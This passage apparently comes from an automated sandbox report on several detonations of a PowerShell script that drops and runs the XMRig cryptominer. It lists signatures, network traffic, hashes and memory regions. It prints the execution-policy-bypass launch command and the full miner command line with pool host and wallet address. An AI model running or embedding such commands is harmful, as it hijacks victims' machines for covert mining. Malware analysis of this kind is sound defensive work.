memory/2844-73-0x00007FF68B010000-0x00007FF68BC43000-memory.dmp
memory/2844-74-0x00007FF68B010000-0x00007FF68BC43000-memory.dmp
memory/2844-75-0x00007FF68B010000-0x00007FF68BC43000-memory.dmp
memory/2844-76-0x00007FF68B010000-0x00007FF68BC43000-memory.dmp
memory/2844-77-0x00007FF68B010000-0x00007FF68BC43000-memory.dmp
memory/2844-78-0x00007FF68B010000-0x00007FF68BC43000-memory.dmp
memory/2844-79-0x00007FF68B010000-0x00007FF68BC43000-memory.dmp
memory/2844-80-0x00007FF68B010000-0x00007FF68BC43000-memory.dmp
memory/2844-81-0x00007FF68B010000-0x00007FF68BC43000-memory.dmp
Analysis: behavioral19
Detonation Overview
Submitted
2024-05-22 20:13
Reported
2024-05-22 20:18
Platform
win10v2004-20240226-en
Max time kernel
301s
Max time network
283s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4472 wrote to memory of 2644 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4472 wrote to memory of 2644 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4112 --field-trial-handle=2292,i,2103142837140538807,15881446839139365070,262144 --variations-seed-version /prefetch:8
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 13.107.253.64:443 | tcp | |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | chromewebstore.googleapis.com | udp |
| US | 8.8.8.8:53 | chromewebstore.googleapis.com | udp |
| GB | 142.250.179.234:443 | chromewebstore.googleapis.com | tcp |
| US | 8.8.8.8:53 | 234.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 27.173.189.20.in-addr.arpa | udp |
Files
memory/4472-0-0x00007FFE94223000-0x00007FFE94225000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zz3livfo.ftq.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4472-10-0x000001936AFB0000-0x000001936AFD2000-memory.dmp
memory/4472-11-0x00007FFE94220000-0x00007FFE94CE1000-memory.dmp
memory/4472-12-0x00007FFE94220000-0x00007FFE94CE1000-memory.dmp
memory/4472-13-0x00007FFE94220000-0x00007FFE94CE1000-memory.dmp
memory/4472-14-0x00007FFE94223000-0x00007FFE94225000-memory.dmp
memory/4472-15-0x00007FFE94220000-0x00007FFE94CE1000-memory.dmp
memory/4472-16-0x00007FFE94220000-0x00007FFE94CE1000-memory.dmp
memory/4472-17-0x00007FFE94220000-0x00007FFE94CE1000-memory.dmp
memory/4472-19-0x000001936B340000-0x000001936B352000-memory.dmp
memory/4472-20-0x000001936B320000-0x000001936B32A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/2644-51-0x0000018D68600000-0x0000018D68620000-memory.dmp
memory/2644-52-0x0000018DFC470000-0x0000018DFC490000-memory.dmp
memory/2644-53-0x00007FF73C240000-0x00007FF73CE73000-memory.dmp
memory/2644-56-0x0000018DFCAE0000-0x0000018DFCB00000-memory.dmp
memory/2644-55-0x0000018DFC8B0000-0x0000018DFC8D0000-memory.dmp
memory/2644-54-0x00007FF73C240000-0x00007FF73CE73000-memory.dmp
memory/2644-57-0x00007FF73C240000-0x00007FF73CE73000-memory.dmp
memory/2644-58-0x00007FF73C240000-0x00007FF73CE73000-memory.dmp
memory/2644-60-0x0000018DFCAE0000-0x0000018DFCB00000-memory.dmp
memory/2644-59-0x0000018DFC8B0000-0x0000018DFC8D0000-memory.dmp
memory/2644-61-0x00007FF73C240000-0x00007FF73CE73000-memory.dmp
memory/2644-62-0x00007FF73C240000-0x00007FF73CE73000-memory.dmp
memory/2644-63-0x00007FF73C240000-0x00007FF73CE73000-memory.dmp
memory/2644-64-0x00007FF73C240000-0x00007FF73CE73000-memory.dmp
memory/2644-65-0x00007FF73C240000-0x00007FF73CE73000-memory.dmp
memory/2644-66-0x00007FF73C240000-0x00007FF73CE73000-memory.dmp
memory/2644-67-0x00007FF73C240000-0x00007FF73CE73000-memory.dmp
memory/2644-68-0x00007FF73C240000-0x00007FF73CE73000-memory.dmp
memory/2644-69-0x00007FF73C240000-0x00007FF73CE73000-memory.dmp
memory/2644-70-0x00007FF73C240000-0x00007FF73CE73000-memory.dmp
memory/2644-71-0x00007FF73C240000-0x00007FF73CE73000-memory.dmp
memory/2644-72-0x00007FF73C240000-0x00007FF73CE73000-memory.dmp
memory/2644-73-0x00007FF73C240000-0x00007FF73CE73000-memory.dmp
memory/2644-74-0x00007FF73C240000-0x00007FF73CE73000-memory.dmp
memory/2644-75-0x00007FF73C240000-0x00007FF73CE73000-memory.dmp
memory/2644-76-0x00007FF73C240000-0x00007FF73CE73000-memory.dmp
memory/2644-77-0x00007FF73C240000-0x00007FF73CE73000-memory.dmp
memory/2644-78-0x00007FF73C240000-0x00007FF73CE73000-memory.dmp
memory/2644-79-0x00007FF73C240000-0x00007FF73CE73000-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-05-22 20:13
Reported
2024-05-22 20:18
Platform
win10v2004-20240508-en
Max time kernel
290s
Max time network
290s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3144 wrote to memory of 4048 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3144 wrote to memory of 4048 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3804,i,15140928051103392835,1612840580898364401,262144 --variations-seed-version --mojo-platform-channel-handle=4120 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 37.56.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.32.126.40.in-addr.arpa | udp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.58.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 84.65.42.20.in-addr.arpa | udp |
Files
memory/3144-0-0x00007FFCAD6B3000-0x00007FFCAD6B5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hj5jtjsj.mlp.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3144-1-0x000002532C470000-0x000002532C492000-memory.dmp
memory/3144-11-0x00007FFCAD6B0000-0x00007FFCAE171000-memory.dmp
memory/3144-12-0x00007FFCAD6B0000-0x00007FFCAE171000-memory.dmp
memory/3144-13-0x00007FFCAD6B0000-0x00007FFCAE171000-memory.dmp
memory/3144-14-0x00007FFCAD6B3000-0x00007FFCAD6B5000-memory.dmp
memory/3144-15-0x00007FFCAD6B0000-0x00007FFCAE171000-memory.dmp
memory/3144-17-0x00007FFCAD6B0000-0x00007FFCAE171000-memory.dmp
memory/3144-18-0x000002532C950000-0x000002532C962000-memory.dmp
memory/3144-19-0x000002532C5B0000-0x000002532C5BA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4048-50-0x000001EB0D5C0000-0x000001EB0D5E0000-memory.dmp
memory/4048-51-0x000001EBA1430000-0x000001EBA1450000-memory.dmp
memory/4048-52-0x00007FF6B03D0000-0x00007FF6B1003000-memory.dmp
memory/4048-55-0x000001EBA1AA0000-0x000001EBA1AC0000-memory.dmp
memory/4048-53-0x00007FF6B03D0000-0x00007FF6B1003000-memory.dmp
memory/4048-54-0x000001EBA1870000-0x000001EBA1890000-memory.dmp
memory/3144-57-0x00007FFCAD6B0000-0x00007FFCAE171000-memory.dmp
memory/4048-56-0x00007FF6B03D0000-0x00007FF6B1003000-memory.dmp
memory/4048-58-0x00007FF6B03D0000-0x00007FF6B1003000-memory.dmp
memory/4048-59-0x000001EBA1870000-0x000001EBA1890000-memory.dmp
memory/4048-60-0x000001EBA1AA0000-0x000001EBA1AC0000-memory.dmp
memory/4048-61-0x00007FF6B03D0000-0x00007FF6B1003000-memory.dmp
memory/4048-62-0x00007FF6B03D0000-0x00007FF6B1003000-memory.dmp
memory/4048-63-0x00007FF6B03D0000-0x00007FF6B1003000-memory.dmp
memory/4048-64-0x00007FF6B03D0000-0x00007FF6B1003000-memory.dmp
memory/4048-65-0x00007FF6B03D0000-0x00007FF6B1003000-memory.dmp
memory/4048-66-0x00007FF6B03D0000-0x00007FF6B1003000-memory.dmp
memory/4048-67-0x00007FF6B03D0000-0x00007FF6B1003000-memory.dmp
memory/4048-68-0x00007FF6B03D0000-0x00007FF6B1003000-memory.dmp
memory/4048-69-0x00007FF6B03D0000-0x00007FF6B1003000-memory.dmp
memory/4048-70-0x00007FF6B03D0000-0x00007FF6B1003000-memory.dmp
memory/4048-71-0x00007FF6B03D0000-0x00007FF6B1003000-memory.dmp
memory/4048-72-0x00007FF6B03D0000-0x00007FF6B1003000-memory.dmp
memory/4048-73-0x00007FF6B03D0000-0x00007FF6B1003000-memory.dmp
memory/4048-74-0x00007FF6B03D0000-0x00007FF6B1003000-memory.dmp
memory/4048-75-0x00007FF6B03D0000-0x00007FF6B1003000-memory.dmp
memory/4048-76-0x00007FF6B03D0000-0x00007FF6B1003000-memory.dmp
memory/4048-77-0x00007FF6B03D0000-0x00007FF6B1003000-memory.dmp
memory/4048-78-0x00007FF6B03D0000-0x00007FF6B1003000-memory.dmp
memory/4048-79-0x00007FF6B03D0000-0x00007FF6B1003000-memory.dmp
memory/4048-80-0x00007FF6B03D0000-0x00007FF6B1003000-memory.dmp
memory/4048-81-0x00007FF6B03D0000-0x00007FF6B1003000-memory.dmp
Analysis: behavioral20
Detonation Overview
Submitted
2024-05-22 20:13
Reported
2024-05-22 20:18
Platform
win11-20240508-en
Max time kernel
292s
Max time network
297s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1516 wrote to memory of 2464 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 1516 wrote to memory of 2464 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| NL | 52.111.243.30:443 | tcp |
Files
memory/1516-0-0x00007FFF60E53000-0x00007FFF60E55000-memory.dmp
memory/1516-3-0x0000015530290000-0x00000155302B2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zavxre1a.ihv.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1516-10-0x00007FFF60E50000-0x00007FFF61912000-memory.dmp
memory/1516-11-0x00007FFF60E50000-0x00007FFF61912000-memory.dmp
memory/1516-12-0x00007FFF60E50000-0x00007FFF61912000-memory.dmp
memory/1516-13-0x00007FFF60E50000-0x00007FFF61912000-memory.dmp
memory/1516-14-0x00007FFF60E50000-0x00007FFF61912000-memory.dmp
memory/1516-15-0x00007FFF60E50000-0x00007FFF61912000-memory.dmp
memory/1516-17-0x0000015530790000-0x00000155307A2000-memory.dmp
memory/1516-18-0x0000015530770000-0x000001553077A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/2464-49-0x000001D26F200000-0x000001D26F220000-memory.dmp
memory/2464-50-0x000001D26F250000-0x000001D26F270000-memory.dmp
memory/2464-51-0x00007FF61CE30000-0x00007FF61DA63000-memory.dmp
memory/2464-53-0x000001D26F270000-0x000001D26F290000-memory.dmp
memory/2464-54-0x000001D270B50000-0x000001D270B70000-memory.dmp
memory/2464-52-0x00007FF61CE30000-0x00007FF61DA63000-memory.dmp
memory/2464-55-0x00007FF61CE30000-0x00007FF61DA63000-memory.dmp
memory/2464-57-0x000001D26F270000-0x000001D26F290000-memory.dmp
memory/2464-56-0x00007FF61CE30000-0x00007FF61DA63000-memory.dmp
memory/2464-58-0x000001D270B50000-0x000001D270B70000-memory.dmp
memory/2464-59-0x00007FF61CE30000-0x00007FF61DA63000-memory.dmp
memory/2464-60-0x00007FF61CE30000-0x00007FF61DA63000-memory.dmp
memory/2464-61-0x00007FF61CE30000-0x00007FF61DA63000-memory.dmp
memory/2464-62-0x00007FF61CE30000-0x00007FF61DA63000-memory.dmp
memory/2464-63-0x00007FF61CE30000-0x00007FF61DA63000-memory.dmp
memory/2464-64-0x00007FF61CE30000-0x00007FF61DA63000-memory.dmp
memory/2464-65-0x00007FF61CE30000-0x00007FF61DA63000-memory.dmp
memory/2464-66-0x00007FF61CE30000-0x00007FF61DA63000-memory.dmp
memory/2464-67-0x00007FF61CE30000-0x00007FF61DA63000-memory.dmp
memory/2464-68-0x00007FF61CE30000-0x00007FF61DA63000-memory.dmp
memory/2464-69-0x00007FF61CE30000-0x00007FF61DA63000-memory.dmp
memory/2464-70-0x00007FF61CE30000-0x00007FF61DA63000-memory.dmp
memory/2464-71-0x00007FF61CE30000-0x00007FF61DA63000-memory.dmp
memory/2464-72-0x00007FF61CE30000-0x00007FF61DA63000-memory.dmp
memory/2464-73-0x00007FF61CE30000-0x00007FF61DA63000-memory.dmp
memory/2464-74-0x00007FF61CE30000-0x00007FF61DA63000-memory.dmp
memory/2464-75-0x00007FF61CE30000-0x00007FF61DA63000-memory.dmp
memory/2464-76-0x00007FF61CE30000-0x00007FF61DA63000-memory.dmp
memory/2464-77-0x00007FF61CE30000-0x00007FF61DA63000-memory.dmp
memory/2464-78-0x00007FF61CE30000-0x00007FF61DA63000-memory.dmp
memory/2464-79-0x00007FF61CE30000-0x00007FF61DA63000-memory.dmp
memory/2464-80-0x00007FF61CE30000-0x00007FF61DA63000-memory.dmp
Analysis: behavioral25
Detonation Overview
Submitted
2024-05-22 20:13
Reported
2024-05-22 20:18
Platform
win10v2004-20240426-en
Max time kernel
297s
Max time network
280s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
